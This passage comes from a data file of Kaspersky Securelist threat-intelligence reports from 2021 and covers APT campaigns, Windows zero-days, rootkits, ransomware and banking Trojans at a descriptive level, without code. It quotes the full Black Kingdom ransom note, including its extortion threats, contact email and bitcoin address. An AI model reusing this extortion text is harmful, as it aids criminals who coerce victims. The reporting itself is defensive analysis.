infections involving usage of a UEFI or MBR bootkit. While the MBR infection has been known since at least 2014, details on the UEFI bootkit were publicly revealed for the first time in our report.\n\nTowards the end of Q3, we identified a previously unknown payload with advanced capabilities, delivered using two infection chains to various government organizations and telecoms companies in the Middle East. The payload makes use of a Windows kernel-mode rootkit to facilitate some of its activities and is capable of being persistently deployed through an MBR or a UEFI bootkit. Interestingly enough, some of the components observed in this attack have been formerly staged in memory by Slingshot agent on multiple occasions, whereby Slingshot is a post-exploitation framework that we covered in several cases in the past (not to be confused with the Slingshot APT). It is mainly known for being a proprietary commercial penetration testing toolkit officially designed for red team engagements. However, it's not the first time that attackers appear to have taken advantage of it. One of our previous reports from 2019 covering FruityArmor's activity showed that the threat group used the framework to target organizations across multiple industries in the Middle East, possibly by leveraging an unknown exploit in a messenger app as an infection vector. In a recent private intelligence report, we provided a drill-down analysis of the newly discovered malicious toolkit that we observed in tandem with Slingshot and how it was leveraged in clusters of activity in the wild. Most notably, we outlined some of the advanced features that are evident in the malware as well as its utilization in a particular long-standing activity against a high-profile diplomatic target in the Middle East.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-30T10:00:31", "type": "securelist", "title": "APT annual review 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2021-28310", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-40449"], "modified": "2021-11-30T10:00:31", "id": "SECURELIST:1F59148E6615695438F94EF4956585AA", "href": "https://securelist.com/apt-annual-review-2021/105127/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-12T10:37:29", "description": "\n\n## Targeted attacks\n\n### The leap of a Cycldek-related threat actor\n\nIt is quite common for Chinese-speaking threat actors to share tools and methodologies: one such example is the infamous "DLL side-loading triad": a legitimate executable, a malicious DLL to be [side-loaded](<https://attack.mitre.org/techniques/T1574/002/>) by it and an encoded payload, generally dropped from a self-extracting archive. This was first thought to be a signature of [LuckyMouse](<https://securelist.com/luckymouse-hits-national-data-center/86083/>), but we have observed other groups using similar "triads", including HoneyMyte. While it is not possible to attribute attacks based on this technique alone, efficient detection of such triads reveals more and more malicious activity.\n\nWe recently described one such file, called "FoundCore", which caught our attention because of the various improvements it brought to this well-known infection vector. We discovered the malware as part of an attack against a high-profile organization in Vietnam. From a high-level perspective, the infection chain follows the expected execution flow:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06085101/Cycldek_01.jpg>)\n\nHowever, in this case, the shellcode was heavily obfuscated \u2013 the technical details were presented in the '[The leap of a Cycldek-related threat actor](<https://securelist.com/the-leap-of-a-cycldek-related-threat-actor/101243/>)' report. We found the loader for this file so interesting that we decided to base one of the tracks of our [Targeted Malware Reverse Engineering](<https://xtraining.kaspersky.com/courses/targeted-malware-reverse-engineering>) course on it.\n\nThe final payload is a remote administration tool that provides full control over the victim machine to its operators. Communication with the server can take place either over raw TCP sockets encrypted with RC4, or via HTTPS.\n\nIn the vast majority of the incidents we discovered, FoundCore executions were preceded by the opening of malicious RTF documents downloaded from static.phongay[.]com \u2013 all generated using [RoyalRoad](<https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper>) and attempting to exploit CVE-2018-0802. All of these documents were blank, suggesting the existence of precursor documents \u2013 possibly delivered by means of spear-phishing or a previous infection \u2013 that trigger the download of the RTF files. Successful exploitation leads to the deployment of further malware \u2013 named DropPhone and CoreLoader.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06091732/Cycldek_06.jpg>)\n\nOur telemetry indicates that dozens of organizations were affected, belonging to the government or military sector, or otherwise related to the health, diplomacy, education or political verticals. Eighty percent of the targets were in Vietnam, though we also identified occasional targets in Central Asia and Thailand.\n\nWhile Cycldek has so far been considered one of the least sophisticated Chinese-speaking threat actors, its targeting is consistent with what we observed in this campaign \u2013 which is why we attribute the campaign, with low confidence, to this threat actor.\n\n### Zero-day vulnerability in Desktop Window Manager used in the wild\n\nWhile analyzing the [CVE-2021-1732](<https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>) exploit, first discovered by DBAPPSecurity Threat Intelligence Center and used by the BITTER APT group, we found another zero-day exploit that we believe is linked to the same threat actor. We reported this new exploit to Microsoft in February and, after confirmation that it is indeed a zero-day, [Microsoft released a patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28310>) for the new zero-day (CVE-2021-28310) as part of its April security updates.\n\nCVE-2021-28310 is an out-of-bounds (OOB) write vulnerability in dwmcore.dll, which is part of Desktop Window Manager (dwm.exe). Due to the lack of bounds checking, attackers are able to create a situation that allows them to write controlled data at a controlled offset using the DirectComposition API. [DirectComposition](<https://docs.microsoft.com/en-us/windows/win32/directcomp/directcomposition-portal>) is a Windows component that was introduced in Windows 8 to enable bitmap composition with transforms, effects and animations, with support for bitmaps of different sources (GDI, DirectX, etc.).\n\nThe exploit was initially identified by our advanced exploit prevention technology and related detection records. Over the past few years, we have built a multitude of exploit protection technologies into our products that have detected several zero-days, proving their effectiveness time and again.\n\nWe believe this exploit is used in the wild, potentially by several threat actors, and it is probably used together with other browser exploits to escape sandboxes or obtain system privileges for further access.\n\nYou can find technical details on the exploit in the '[Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>)' post. Further information about BITTER APT and IOCs are available to customers of the Kaspersky Intelligence Reporting service: contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n### Operation TunnelSnake\n\nWindows rootkits, especially those operating in kernel space, enjoy high privileges in the system, allowing them to intercept and potentially tamper with core I/O operations conducted by the underlying OS, like reading or writing to files or processing incoming and outgoing network packets. Their ability to blend into the fabric of the operating system itself is how rootkits have gained their notoriety for stealth and evasion.\n\nNevertheless, over the years, it has become more difficult to deploy and execute a rootkit component in Windows. The introduction by Microsoft of Driver Signature Enforcement and Kernel Patch Protection (PatchGuard) has made it harder to tamper with the system. As a result, the number of Windows rootkits in the wild has decreased dramatically: most of those that are still active are often used in high-profile APT attacks.\n\nOne such example came to our attention during an investigation last year, in which we uncovered a previously unknown and stealthy implant in the networks of regional inter-governmental organizations in Asia and Africa. This rootkit, which we dubbed "Moriya", was used to deploy passive backdoors on public facing servers, facilitating the creation of a covert C2 (Command and Control) communication channel through which they can be silently controlled.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/08151011/Operation_TunnelSnake_01.png>)\n\nThis tool was used as part of an ongoing campaign that we named "[TunnelSnake](<https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/>)". The rootkit was detected on the targeted machines as early as November 2019; and another tool we found, showing significant code overlaps with the rootkit, suggests that the developers had been active since at least 2018.\n\nSince neither the rootkit nor other lateral movement tools that accompanied it during the campaign relied on hardcoded C2 servers, we could gain only partial visibility into the attacker's infrastructure. However, the bulk of the detected tools besides Moriya, consist of both proprietary and well-known pieces of malware that were previously in use by Chinese-speaking threat actors, giving a clue to the attacker's origin.\n\n### PuzzleMaker\n\nOn April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits.\n\nWhile we were not able to retrieve the exploit used for Remote Code Execution (RCE) in the Chrome web-browser, we were able to find and analyze an Escalation of Privilege (EoP) exploit used to escape the sandbox and obtain system privileges. This EoP exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 - RS5, 18362 - 19H1, 18363 - 19H2, 19041 - 20H1, 19042 - 20H2), and exploits two distinct vulnerabilities in the Microsoft Windows OS kernel.\n\nOn April 20, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the Information Disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8, as a part of the June Patch Tuesday.\n\nThe exploit-chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a "remote shell"-style backdoor, which in turns connects to the C2 to get commands.\n\nWe weren't able to find any connections or overlaps with a known threat actor, so we tentatively named this cluster of activity [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).\n\n### Andariel adds ransomware to its toolset\n\nIn April, we discovered a suspicious Word document containing a Korean file name and decoy uploaded to VirusTotal. The document contained an unfamiliar macro and used novel techniques to implant the next payload. Our telemetry revealed two infection methods used in these attacks, with each payload having its own loader for execution in memory. The threat actor only delivered the final stage payload for selected victims.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/15094853/Andariel_delivered_ransomware_01.png>)\n\nDuring the course of our research, Malwarebytes published a [report](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/>) with technical details about the same series of attacks, which attributed it to the Lazarus group. However, after thorough analysis, we reached the conclusion that the attacks were the work of Andariel, a sub-group of Lazarus, based on code overlaps between the second stage payload in this campaign and previous malware from this threat actor.\n\nHistorically, Andariel has mainly targeted organizations in South Korea; and our telemetry suggests that this is also the case in this campaign. We confirmed several victims in the manufacturing, home network service, media and construction sectors.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/15095550/Andariel_delivered_ransomware_08.png>)\n\nWe also found additional connections with the Andariel group. Each threat actor has a characteristic habit when they interactively work with a backdoor shell in the post-exploitation phase of an attack. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity.\n\nNotably, in addition to the final backdoor, we discovered one victim infected with custom ransomware, underlying the financial motivation of this threat actor.\n\n### Ferocious Kitten\n\n[Ferocious Kitten](<https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/>) is an APT threat actor that has targeted Persian-speaking individuals who appear to be based in Iran. The group has mostly operated under the radar and, as far as we know, has not been covered by security researchers. The threat actor attracted attention recently when a lure document was uploaded to VirusTotal and went public thanks to [researchers on Twitter](<https://twitter.com/reddrip7/status/1366703445990723585?s=21>). Since then, one of its implants [has been analyzed](<http://www.hackdig.com/03/hack-293629.htm>) by a Chinese threat intelligence firm.\n\nWe were able to expand on some of the findings about the group and provide insights into the additional variants that it uses. The malware dropped from the lure document, dubbed "MarkiRAT", records keystrokes, clipboard content, and provides file download and upload capabilities as well as the ability to execute arbitrary commands on the victim's computer. We were able to trace the implant back to at least 2015, along with variants intended to hijack the execution of Telegram and Chrome applications as a persistence method.\n\nFerocious Kitten is one of the groups that operate in a wider eco-system intended to track individuals in Iran. Such threat groups aren't reported very often; and so are able to re-use infrastructure and toolsets without worrying about them being taken down or flagged by security solutions. Some of the TTPs used by this threat actor are reminiscent of other groups that are active against a similar set of targets, such as Domestic Kitten and Rampant Kitten.\n\n## Other malware\n\n### Evolution of JSWorm ransomware\n\nWhile ransomware has been around for a long time, it has evolved over time as attackers have improved their technologies and refined their tactics. We have seen a shift away from the random, speculative attacks of five years ago, and even from the massive outbreaks such as [WannaCry](<https://securelist.com/wannacry-faq-what-you-need-to-know-today/78411/>) and [NotPetya](<https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/>). Many ransomware gangs have switched to the more profitable tactic of "big-game hunting"; and news of ransomware attacks affecting large corporations, and even critical infrastructure installations, has become commonplace. Moreover, there's now a [well-developed eco-system underpinning ransomware attacks](<https://securelist.com/ransomware-world-in-2021/102169/>).\n\nAs a result, even though [the number of ransomware attacks has fallen](<https://securelist.com/ransomware-by-the-numbers-reassessing-the-threats-global-impact/101965/>), and individuals are probably less likely to encounter ransomware than a few years ago, the threat to organizations is greater than ever.\n\nWe recently published analysis of one such ransomware family, named [JSWorm](<https://securelist.com/evolution-of-jsworm-ransomware/102428/>). This malware was discovered in 2019, and since then different variants have gained notoriety under various names such as Nemty, Nefilim, Offwhite and others.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24115814/JSworm_malware_01.png>)\n\nEach "re-branded" version has included alterations to different aspects of the code \u2013 file extensions, cryptographic schemes, encryption keys, programming language and distribution model. Since it emerged, JSWorm has developed from a typical mass-scale ransomware threat affecting mostly individual users into a typical big-game hunting ransomware threat attacking high-profile targets and demanding massive ransom payments.\n\n### Black Kingdom ransomware\n\n[Black Kingdom](<https://securelist.com/black-kingdom-ransomware/102873/>) first appeared in 2019; in 2020 the group was observed exploiting vulnerabilities (such as CVE-2019-11510) in its attacks. In recent activity, the ransomware was used by an unknown adversary for exploiting a Microsoft Exchange vulnerability (CVE-2021-27065, aka [ProxyLogon](<https://proxylogon.com/>)). This ransomware family is much less sophisticated than other [Ransomware-as-a-Service](<https://encyclopedia.kaspersky.com/glossary/ransomware-as-a-service-raas/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (RaaS) or big game hunting families. The group's involvement in the Microsoft Exchange exploitation campaign suggests opportunism rather than a resurgence in activity from this ransomware family.\n\nThe malware is coded in Python and compiled to an executable using PyInstaller. The ransomware supports two encryption modes: one generated dynamically and one using a hardcoded key. Code analysis revealed an amateurish development cycle and the possibility of recovering files that have been encrypted with Black Kingdom with the help of the hardcoded key. At the time of analysis, there was already a [script to recover files encrypted with the embedded key](<https://blog.cyberint.com/black-kingdom-ransomware>).\n\nBlack Kingdom changes the desktop background to a note that the system is infected while it encrypts files, disabling the mouse and keyboard as it does so.\n \n \n ***************************\n | We Are Back ?\n ***************************\n \n We hacked your (( Network )), and now all files, documents, images,\n databases and other important data are safely encrypted using the strongest algorithms ever.\n You cannot access any of your files or services .\n But do not worry. You can restore everthing and get back business very soon ( depends on your actions )\n \n before I tell how you can restore your data, you have to know certain things :\n \n We have downloaded most of your data ( especially important data ) , and if you don't contact us within 2 days, your data will be released to the public.\n \n To see what happens to those who didn't contact us, just google : ( Blackkingdom Ransomware )\n \n ***************************\n | What guarantees ?\n ***************************\n \n We understand your stress and anxiety. So you have a free opportunity to test our service by instantly decrypting one or two files for free\n just send the files you want to decrypt to (support_blackkingdom2@protonmail.com\n \n ***************************************************\n | How to contact us and recover all of your files ?\n ***************************************************\n \n The only way to recover your files and protect from data leaks, is to purchase a unique private key for you that we only posses .\n \n \n [ + ] Instructions:\n \n 1- Send the decrypt_file.txt file to the following email ===> support_blackkingdom2@protonmail.com\n \n 2- send the following amount of US dollars ( 10,000 ) worth of bitcoin to this address :\n \n [ 1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT ]\n \n 3- confirm your payment by sending the transfer url to our email address\n \n 4- After you submit the payment, the data will be removed from our servers, and the decoder will be given to you,\n so that you can recover all your files.\n \n ## Note ##\n \n Dear system administrators, do not think you can handle it on your own. Notify your supervisors as soon as possible.\n By hiding the truth and not communicating with us, what happened will be published on social media and yet in news websites.\n \n Your ID ==>\n FDHJ91CUSzXTquLpqAnP\n\nAfter decompiling the Python code, we discovered that the code base for Black Kingdom has its origins in an open-source ransomware builder [available on GitHub](<https://github.com/BuchiDen/Ransomware_RAASNet/blob/master/RAASNet.py>). The group adapted parts of the code, adding features that were not originally presented in the builder, such as the hardcoded key. We were not able to attribute Black Kingdom to any known threat group.\n\nBased on our telemetry, we could see only a few hits by Black Kingdom in Italy and Japan.\n\n### Gootkit: the cautious banking Trojan\n\n[Gootkit](<https://securelist.com/gootkit-the-cautious-trojan/102731/>) belongs to a class of Trojans that are extremely tenacious, but not widespread. Since it's not very common, new versions of the Trojan may remain under the researchers' radar for long periods.\n\nIt is complex multi-stage banking malware, which was initially discovered by Doctor Web in 2014. Initially, it was distributed via spam and exploits kits such as Spelevo and RIG. In conjunction with spam campaigns, the adversaries later switched to compromised websites where visitors are tricked into downloading the malware.\n\nGootkit is capable of stealing data from the browser, performing man-in-the-browser attacks, keylogging, taking screenshots, and lots of other malicious actions. The Trojan's loader performs various virtual machine and sandbox checks and uses sophisticated persistence algorithms.\n\nIn 2019, Gootkit stopped operating after it experienced a [data leak](<https://www.zdnet.com/article/gootkit-malware-crew-left-their-database-exposed-online-without-a-password/>), but has been [active again](<https://www.bleepingcomputer.com/news/security/gootkit-malware-returns-to-life-alongside-revil-ransomware/>) since November 2020. Most of the victims are located in EU countries such as Germany and Italy.\n\n### Bizarro banking Trojan expands into Europe\n\nBizarro is one more banking Trojan family originating from Brazil that is now found in other parts of the world. We have seen people being targeted in Spain, Portugal, France and Italy. This malware has been used to steal credentials from customers of 70 banks from different European and South American countries.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/14143631/Bizarro_trojan_13.png>)\n\nAs with [Tetrade](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>), Bizarro uses affiliates or recruits money mules to cash out or simply to help with money transfers.\n\nBizarro is distributed via MSI packages downloaded by victims from links in spam emails. Once launched, it downloads a ZIP archive from a compromised website. We observed hacked WordPress, Amazon and Azure servers used by the Trojan for storing archives. The backdoor, which is the core component of Bizarro, contains more than 100 commands and allows the attackers to steal online banking account credentials. Most of the commands are used to display fake pop-up messages and seek to trick people into entering two-factor authentication codes. The Trojan may also use social engineering to convince victims to download a smartphone app.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/14143359/Bizarro_trojan_12.png>)\n\nBizarro is one of several banking Trojans from South America that have extended their operations into other regions \u2013 mainly Europe. They include Guildma, Javali, Melcoz, Grandoreiro and Amavaldo.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/17095011/Map_of_Brazilian_families.jpeg>)\n\n### Malicious code in APKPure app\n\nIn early April, we [discovered malicious code in version 3.17.18 of the official client of the APKPure app store](<https://securelist.com/apkpure-android-app-store-infected/101845/>), a popular alternative source of Android apps. [The incident seems to be similar to what happened with CamScanner](<https://www.kaspersky.com/blog/camscanner-malicious-android-app/28156/>), when the app's developer implemented an adware SDK from an unverified source.\n\nWhen launched, the embedded Trojan dropper, which our solutions detect as HEUR:Trojan-Dropper.AndroidOS.Triada.ap, unpacks and runs its payload, which is able to show ads on the lock screen, open browser tabs, collect information about the device, and download other malicious code. The Trojan downloaded depends on the version of Android and how recently security updates have been installed. In the case of relatively recent versions of the operating system (Android 8 or higher) it loads additional modules for the [Triada Trojan](<https://www.kaspersky.com/blog/triada-trojan/11481/>). If the device is older (Android 6 or 7, and without security updates installed) it could be the [xHelper Trojan](<https://securelist.com/unkillable-xhelper-and-a-trojan-matryoshka/96487/>).\n\nWe reported the issue to APKPure on April 8. APKPure acknowledged the problem the following day and, soon afterwards, posted a new version (3.17.19) that does not contain the malicious component.\n\n### Browser lockers\n\nBrowser lockers are designed to prevent the victim from using their browser unless they pay a ransom. The "locking" consists of preventing the victim from leaving the current tab, which displays intimidating messages, often with sound and visual effects. The locker tries to trick the victim into making a payment with threats of losing data or legal liability.\n\nThis type of fraud has long been on the radar of researchers, and over the last decade there have been numerous browser locking campaigns targeting people worldwide. The tricks used by the scammers include imitating the infamous "[Blue Screen of Death](<https://encyclopedia.kaspersky.com/glossary/blue-screen-of-death-bsod/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>)" (BSOD) in the browser, false warnings about system errors or detected malware, threats to encrypt files and legal liability notices.\n\nIn our [report on browser lockers](<https://securelist.com/browser-lockers-extortion-disguised-as-a-fine/101735/>), we examined two families of lockers that mimic government websites.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/01145253/MVD_fake_sites_07-scaled.jpeg>)\n\nBoth families spread mainly via advertising networks, primarily aimed at selling "adult" content and movies in an intrusive manner; for example, through tabs or windows that open on top of the visited site when loading a page with an embedded ad module (pop-ups), or after clicking anywhere on the page (click-unders).\n\nThese threats are not technically complex: they simply aim to create the illusion of having locked the computer and intimidate victims into paying money. Landing on such a page by mistake will not harm your device or compromise your data, as long as you don't fall for the cybercriminals' smoke-and-mirror tactics.\n\n### Malware targets Apple M1 chip\n\nLast November, Apple unveiled its M1 chip. The new chip, which has replaced Intel processors in several of its products, is based on ARM architecture instead of the x86 architecture traditionally used in personal computers. This lays the foundation for Apple to switch completely to its own processors and unify its software under a single architecture. Unfortunately, just months after the release, [malware writers had already adapted several malware families to the new processor](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>).\n\n### Attempted supply-chain attack using PHP\n\nIn March, [unknown attackers tried to carry out a supply-chain attack by introducing malicious code to the PHP scripting language](<https://www.kaspersky.com/blog/php-git-backdor/39191/>). The developers of PHP make changes to the code using a common repository built on the GIT version control system. The attackers tried to add a backdoor to the code. Fortunately, a developer noticed something suspicious during a routine check. Had they not done so, the backdoor might have allowed attackers to run malicious code remotely on web servers, in around 80 per cent of which (web servers) PHP is used.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-08-12T10:00:37", "type": "securelist", "title": "IT threat evolution Q2 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0802", "CVE-2019-11510", "CVE-2021-1732", "CVE-2021-27065", "CVE-2021-28310", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-08-12T10:00:37", "id": "SECURELIST:934E8AA177A27150B87EC15F920BF350", "href": "https://securelist.com/it-threat-evolution-q2-2021/103597/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-04T10:41:58", "description": "\n\nFor more than four years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q2 2021.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## The most remarkable findings\n\nInvestigating the recent Microsoft Exchange vulnerabilities we and our colleagues from AMR found an attacker deploying a previously unknown backdoor, "FourteenHi", in a campaign that we dubbed ExCone, active since mid-March. During our investigation we revealed multiple tools and variants of FourteenHi, configured with infrastructure that FireEye reported as being related to the UNC2643 activity cluster. Moreover, we saw ShadowPad detections coincide with FourteenHi variant infections, possibly hinting at a shared operator between these two malware families.\n\nFourteenHi abuses the popular VLC media player to execute its loader. It is capable of performing basic backdoor functions. Further investigation also revealed scripts used by the actor to gain situational awareness post-exploitation, as well as previous use of the infrastructure to operate Cobalt Strike Beacon.\n\nAlthough we couldn't directly attribute this activity to any known threat actor, we found older, highly similar 64-bit samples of the backdoor used in close proximity with ShadowPad malware, mostly known for its operations involving supply-chain attacks as an infection vector. Notably, we also found one C2 IP used in a 64-bit sample reportedly used in the UNC2643 activity set, associated with the HAFNIUM threat actor, also using Cobalt Strike, DLL side-loading and exploiting the same Exchange vulnerabilities.\n\n## Russian-speaking activity\n\nOn May 27 and 28, details regarding an ongoing email campaign against diplomatic entities throughout Europe and North America were released by Volexity and Microsoft. These attacks were attributed to Nobelium and APT29 by Microsoft and Volexity respectively. While we were able to verify the malware and possible targeting for this cluster of activity, we haven't been able to make a definitive assessment at this time about which threat actor is responsible, although we found ties to Kazuar. We have designated it as a new threat actor and named it "HotCousin". The attacks began with a spear-phishing email which led to an ISO file container being stored on disk and mounted. From here, the victim was presented with a LNK file made to look like a folder within an Explorer window. If the victim double clicked on it, the LNK then executed a loader written in .NET referred to as BoomBox, or a DLL. The execution chain ultimately ended with a Cobalt Strike beacon payload being loaded into memory. According to public blogs, targeting was widespread but focused primarily on diplomatic entities throughout Europe and North America: based on the content of the lure documents bundled with the malware, this assessment appears to be accurate. This cluster of activity was conducted methodically beginning in January with selective targeting and slow operational pace, then ramping up and ending in May. There are indications of previous activity from this threat actor dating back to at least October 2020, based on other Cobalt Strike payloads and loaders bearing similar toolmarks.\n\n## Chinese-speaking activity\n\nWhile investigating a recent rise of attacks against Exchange servers, we noticed a recurring cluster of activity that appeared in several distinct compromised networks. This cluster stood out because it used a formerly unknown Windows kernel mode rootkit and a sophisticated multi-stage malware framework aimed at providing remote control over the attacked servers. The former is used to hide the user mode malware's artefacts from investigators and security solutions, while demonstrating an interesting loading scheme involving the kernel mode component of an open source project named "Cheat Engine" to bypass the Windows Driver Signature Enforcement mechanism. We were able to determine that this toolset had been in use from as early as July 2020; and that the threat actor was mostly focused on Southeast Asian targets, including several governmental entities and telecoms companies. Since this was a long-standing operation, with high-profile victims, an advanced toolset and no affinity to a known threat actor, we decided to name the underlying cluster "GhostEmperor".\n\nAPT31 (aka ZIRCONIUM) is a Chinese-speaking intrusion set. This threat actor set up an ORB (Operational Relay Boxes) infrastructure, composed of several compromised SOHO routers, to target entities based in Europe (and perhaps elsewhere). As of the publication of our report in May, we had seen these ORBs used to relay Cobalt Strike communications and for anonymization proxying purposes. It is likely that APT31 uses them for other implants and ends as well (for example, exploit or malware staging). Most of the infrastructure put in place by APT31 comprises compromised Pakedge routers (RK1, RE1 and RE2). This little-known constructor specializes in small enterprise routers and network devices. So far, we don't know which specific vulnerability has been exploited by the intrusion set to compromise the routers. Nor do we currently possess telemetry that would provide further visibility into this campaign. We will, of course, continue to track these activities.\n\nFollowing our previous report on EdwardsPheasant, DomainTools and BitDefender published articles about malicious activities against targets in Southeast Asia which we believe, with medium to high confidence, are parts of EdwardsPheasant campaigns. While tracking the activities of this threat actor, analyzing samples discovered or provided by third parties, and investigating from public IoCs, we discovered an updated DropPhone implant, an additional implant loaded by FoundCore's shellcode, several possible new infection documents and malicious domain names, as well as additional targets. While we do not believe we have a complete picture of this set of activities yet, our report this quarter marks a significant step further in understanding its extent.\n\nA Chinese-speaking APT compromised a certificate authority in Mongolia and replaced digital certificate management client software with a malicious downloader in February. We are tracking this group as BountyGlad. Related infrastructure was identified and used in multiple other incidents: interesting related activity included server-side attacks on WebSphere and WebLogic services in Hong Kong; and on the client-side, Trojanized Flash Player installers. The group demonstrated an increase in strategic sophistication with this supply-chain attack. While replacing a legitimate installer on a high value website like a certificate authority requires a medium level of skill and coordination, the technical sophistication is not on par with ShadowHammer. And while the group deploys fairly interesting, but simplistic, steganography to cloak its shellcode, we think it was probably generated with code that has been publicly available for years. Previous activity also connected with this group relied heavily on spear-phishing and Cobalt Strike throughout 2020. Some activity involved PowerShell commands and loader variants different from the downloaders presented in our recent report. In addition to spear-phishing, the group appears to rely on publicly available exploits to penetrate unpatched target systems. They use implants and C2 (Command and Control) code that are a mix of both publicly available and privately shared across multiple Chinese-speaking APTs. We are able to connect infrastructure across multiple incidents. Some of those were focused on Western targets in 2020. Some of the infrastructure listed in an FBI Flash alert published in May 2020, targeting US organizations conducting COVID-19 research, was also used by BountyGlad.\n\nWhile investigating users infected with the TPCon backdoor, previously discussed in a private report, we detected loaders which are part of a new multi-plugin malware framework that we named "QSC", which allows attackers to load and run plugins in-memory. We attribute the use of this framework to Chinese-speaking groups, based on some overlaps in victimology and infrastructure with other known tools used by these groups. We have so far observed the malware loading a Command shell and File Manager plugins in-memory. We believe the framework has been used in the wild since April 2020, based on the compilation timestamp of the oldest sample found. However, our telemetry suggests that the framework is still in use: the latest activity we detected was in March this year.\n\nEarlier this month, Rostelecom Solar and NCIRCC issued a joint public report describing a series of attacks against networks of government entities in Russia. The report described a formerly unknown actor leveraging an infection chain that leads to the deployment of two implants - WebDav-O and Mail-O. Those, in conjunction with other post-exploitation activity, have led to network-wide infections in the targeted organizations that resulted in exfiltration of sensitive data. We were able to trace the WebDav-O implant's activity in our telemetry to at least 2018, indicating government affiliated targets based in Belarus. Based on our investigation, we were able to find additional variants of the malware and observe some of the commands executed by the attackers on the compromised machines.\n\nWe discovered a cluster of activity targeting telecom operators within a specific region. The bulk of this activity took place from May to October 2020. This activity made use of several malware families and tools; but the infrastructure, a staging directory, and in-country target profiles tie them together. The actors deployed a previously unknown passive backdoor, that we call "TPCon", as a primary implant. It was later used to perform both reconnaissance within target organizations and to deploy a 